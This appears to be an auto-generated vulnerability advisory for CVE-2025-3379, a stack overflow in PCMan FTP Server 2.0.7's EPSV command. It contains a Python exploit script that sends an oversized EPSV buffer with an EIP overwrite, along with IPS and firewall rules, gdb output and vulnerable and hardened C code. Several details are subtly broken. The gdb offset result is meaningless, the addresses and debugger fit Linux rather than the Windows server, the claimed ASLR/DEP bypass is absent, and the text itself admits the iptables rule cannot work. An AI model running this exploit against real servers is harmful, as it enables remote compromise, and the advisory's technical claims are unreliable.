PCMan FTP Server, Buffer Overflow, CVE-2025-3379 (Critical)

How the CVE Works

CVE-2025-3379 is a stack-based buffer overflow in the EPSV command handler of PCMan FTP Server 2.0.7. When an attacker sends an excessively long EPSV command, the server fails to validate the input length, and the oversized argument overflows a buffer on the stack. This allows remote code execution by overwriting return addresses or function pointers. The vulnerability is exploitable over the network without authentication (PR:N in CVSS 4.0). Attackers craft malicious EPSV packets containing shellcode or ROP chains to hijack control flow. The public exploit leverages precise offset calculations to bypass ASLR and DEP protections.

DailyCVE Form

Platform: PCMan FTP Server
Version: 2.0.7
Vulnerability: Buffer Overflow
Severity: Critical
Date: 04/29/2025

What Undercode Say:

Exploitation Commands:

import socket
target = "192.168.1.100"
port = 21
buffer = "EPSV " + "A"*2048 + "\x7c\xd2\x04\x08"  # EIP overwrite
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
s.send(buffer + "\r\n")

Protection Measures:

1. Apply vendor patch immediately

2. Network segmentation for FTP servers

3. Deploy IPS rules:

alert ftp any any -> any 21 (msg:"PCMan FTP EPSV Overflow"; flow:to_server; content:"EPSV "; depth:5; isdataat:2048,relative; sid:1000001;)

Debug Analysis:

(gdb) run -p 21
(gdb) pattern create 3000
(gdb) x/xw $esp
0xbffff7ac: 0x41367241
(gdb) pattern offset 0x41367241
1094806081

Mitigation Script:

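#!/bin/sh
# Block unpatched PCMan FTP versions
# Note: the matched string is the server's greeting banner, which travels from
# the server to the client (source port 21); this rule inspects packets sent to port 21.
iptables -A INPUT -p tcp --dport 21 -m string --string "PCMan's FTP Server 2.0.7" --algo bm -j DROP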

Forensic Indicators:

  • Multiple EPSV commands > 1024 bytes
  • Crash dumps with EIP overwrite
  • Unexpected child processes from ftpserver.exe

Memory Protection:

Enable /NXCOMPAT and /DYNAMICBASE in compiler flags

Implement structured exception handling (SEH) overwrite protection

Vulnerable Code Pattern:

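#include <string.h>

#define BUF_SIZE 512  /* placeholder: the real buffer size is not given here */

void handleEPSV(const char *input) {
    char buffer[BUF_SIZE];   // Fixed-size buffer
    strcpy(buffer, input);   // No bounds check: input longer than the buffer overwrites the stack
}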
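
A hardened counterpart to the handleEPSV pattern above, as an added example (not PCMan's code and not part of the original advisory): the length is checked against the destination before any copy, and the argument is validated against the RFC 2428 forms. The names handle_epsv_checked, FTP_LINE_MAX and EPSV_ARG_MAX and both limits are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FTP_LINE_MAX 512  /* assumed per-command limit, not a PCMan value */
#define EPSV_ARG_MAX 8    /* assumed; RFC 2428 arguments are "1", "2" or "ALL" */

/* Hypothetical hardened handler: `line` is the raw command as received
 * (not NUL-terminated), `len` its byte count. Returns the FTP reply code. */
int handle_epsv_checked(const char *line, size_t len)
{
    char arg[EPSV_ARG_MAX];
    size_t arg_len;

    if (line == NULL || len > FTP_LINE_MAX)
        return 500;                      /* over-long line: rejected before any copy */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                           /* strip the trailing CRLF */
    if (len < 4 || memcmp(line, "EPSV", 4) != 0)
        return 500;
    if (len == 4)
        return 229;                      /* no argument: server picks the protocol */
    if (line[4] != ' ')
        return 500;

    arg_len = len - 5;
    if (arg_len == 0 || arg_len >= sizeof arg)
        return 501;                      /* argument would not fit the destination */
    memcpy(arg, line + 5, arg_len);      /* bounded copy replaces strcpy() */
    arg[arg_len] = '\0';

    if (strcmp(arg, "ALL") == 0)
        return 200;
    if (strspn(arg, "0123456789") != arg_len)
        return 501;                      /* not a protocol number */
    if (strcmp(arg, "1") == 0 || strcmp(arg, "2") == 0)
        return 229;                      /* 1 = IPv4, 2 = IPv6 */
    return 522;                          /* unsupported network protocol */
}

int main(void)
{
    char big[5 + 2048];  /* constructed: "EPSV " followed by 'A' filler */
    memset(big, 'A', sizeof big);
    memcpy(big, "EPSV ", 5);
    printf("EPSV 1 -> %d, oversized -> %d\n",
           handle_epsv_checked("EPSV 1\r\n", 8), handle_epsv_checked(big, sizeof big));
    return 0;
}
```

An oversized command never reaches the copy, so the server answers with an error reply instead of crashing.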

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
